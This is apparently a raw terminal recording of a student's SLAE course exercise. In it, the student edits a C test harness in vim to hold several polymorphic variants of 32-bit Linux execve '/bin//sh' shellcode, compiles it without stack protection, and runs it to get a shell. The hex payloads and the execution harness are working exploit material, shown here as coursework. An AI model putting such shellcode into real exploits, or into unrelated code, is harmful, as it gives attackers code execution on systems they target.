[37.818668, "o", "      printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                         "]
[37.818911, "o", "                       \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 18L, 372C                                                                        9,138-152     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38"]
[37.81905, "o", ";5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;39H\u001b[?12l\u001b[?25h"]
[37.88899, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n  "]
[37.894067, "o", "      printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                         "]
[37.894305, "o", "                       \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 18L, 372C                                                                        9,138-152     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38"]
[37.894436, "o", ";5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;39H\u001b[?12l\u001b[?25h"]
[38.406757, "o", "\u001b[32;86Hd\u001b[10;39H"]
[38.599107, "o", "\u001b[32;87Hd\u001b[10;39H\u001b[?25l"]
[38.600109, "o", "\u001b[32;86H  \u001b[9;31r\u001b[9;1H\u001b[2M\u001b[30;1H\u001b[94m~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[39m\u001b[32;1H\u001b[K\u001b[95C9,0-1\u001b[9CAll\u001b[1;33r\u001b[9;1H\u001b[?12l\u001b[?25h"]
[38.854846, "o", "\u001b[32;86HO\b \r\u001b[1m-- INSERT --\u001b(B\u001b[m\u001b[83C\u001b[K9,10-24\u001b[7CTop\u001b[9;31r\u001b[9;1H\u001b[1L\u001b[32;96H\u001b[K9,10-24\u001b[7CAll\u001b[1;33r\u001b[9;24H"]
[39.142473, "o", "\u001b[31m\"\u001b[32;99H\u001b[39m1-25\u001b[9;25H"]
[39.86467, "o", "\u001b[10;31r\u001b[10;1H\u001b[1L\u001b[9;25H\u001b[35m\\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\xx\r69\\x6e\\x2f\\x2f\\x73\\x68\u001b[1;33r\u001b[10;23H\u001b[?25l\u001b(B\u001b[m"]
[39.865385, "o", "\u001b[32;96H\u001b[K9,122-136     All\u001b[10;23H\u001b[?12l\u001b[?25h"]
[40.078789, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"She"]
[40.079067, "o", "llcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                                               "]
[40.079277, "o", " \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\u001b[1m-- INSERT --\u001b(B\u001b[m                                                                                   9,122-136     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b["]
[40.079403, "o", "38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;23H\u001b[?12l\u001b[?25h"]
[40.162985, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"She"]
[40.163293, "o", "llcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                                               "]
[40.163438, "o", " \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\u001b[1m-- INSERT --\u001b(B\u001b[m                                                                                   9,122-136     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b["]
[40.163557, "o", "38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;23H\u001b[?12l\u001b[?25h"]
[40.342863, "o", "\u001b[31m\"\u001b[32;100H\u001b[39m3-137\u001b[10;24H"]
[40.470667, "o", ";\u001b[32;100H4-138\u001b[10;25H"]
[40.817727, "o", "\u001b[32;1H\u001b[K\u001b[85C^[\u001b[10;24H\u001b[?25l"]
[40.918394, "o", "\u001b[32;86H  \u001b[8C9,123-137     All\u001b[10;24H\u001b[?12l\u001b[?25h"]
[40.964665, "o", "\u001b[32;86H:\b\u001b[K\r:"]
[41.204803, "o", "w"]
[41.35775, "o", "q"]
[41.58056, "o", "\r"]
[41.582622, "o", "\"shellcode.c\"\u001b[?25l"]
[41.589055, "o", " 18L, 357C written"]
[41.593207, "o", "\r"]
[41.593443, "o", "\u001b[1;32r\u001b[32;113H\n\u001b[1;33r\u001b[32;1H"]
[41.593881, "o", "\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff"]
[41.594018, "o", "\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[4A\u001b[?12l\u001b[?25h"]
[41.599605, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[28;1H \r"]
[41.601187, "o", "\u001b[1;32r\u001b[29;32r\u001b[4S\u001b[28;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[28;60H\u001b(B\u001b[m"]
[41.601379, "o", "\r\n"]
[41.601552, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[41.601896, "o", "\u001b[K"]
[41.602197, "o", "\u001b[?2004h"]
[43.120452, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[33;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m "]
[43.1258, "o", "SLAE \u001b(B\u001b[m\u001b[29;4H\u001b[?12l\u001b[?25h"]
[43.126249, "o", "."]
[43.215474, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[43.215806, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellco"]
[43.216018, "o", "de.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[29;5H\u001b[?12l\u001b[?25h"]
[43.274276, "o", "\b.."]
[43.324123, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[43.324396, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellco"]
[43.324554, "o", "de.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[29;6H\u001b[?12l\u001b[?25h"]
[43.859514, "o", "/"]
[44.117438, "o", "."]
[44.308271, "o", "."]
[44.563282, "o", "/"]
[45.331346, "o", "b"]
[45.427283, "o", "i"]
[45.683962, "o", "n"]
[45.80213, "o", "\u001b[1m/\u001b(B\u001b[m"]
[46.162659, "o", "\b/s"]
[46.203446, "o", "h"]
[46.458408, "o", "\b\b.sh\u001b[3D"]
[46.82877, "o", "\u001b[C.sh\u001b[3D"]
[47.451115, "o", "sh \u001b[4D"]
[47.54647, "o", "c.sh\u001b[3D"]
[47.649852, "o", "o.sh\u001b[3D"]
[47.89407, "o", "mpile.sh\u001b[1m \u001b(B\u001b[m"]
[48.537458, "o", "\b s"]
[48.609263, "o", "h"]
[48.832482, "o", "ellcode"]
[49.080805, "o", "."]
[49.248501, "o", "c"]
[49.529334, "o", "\r\n\u001b[?2004l"]
[49.538473, "o", "[*] Compiling shellcode"]
[49.540388, "o", "\r\n"]
[49.544881, "o", "\u001b]0;SLAE ❐ SLAE ● 1 bash\u0007\u001b[?25l\u001b[33d\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m S"]
[49.579625, "o", "LAE \u001b(B\u001b[m\u001b[31;1H\u001b[?12l\u001b[?25h"]
[49.581522, "o", "[+] Calling gcc without stack protection\r\n"]
[49.682207, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
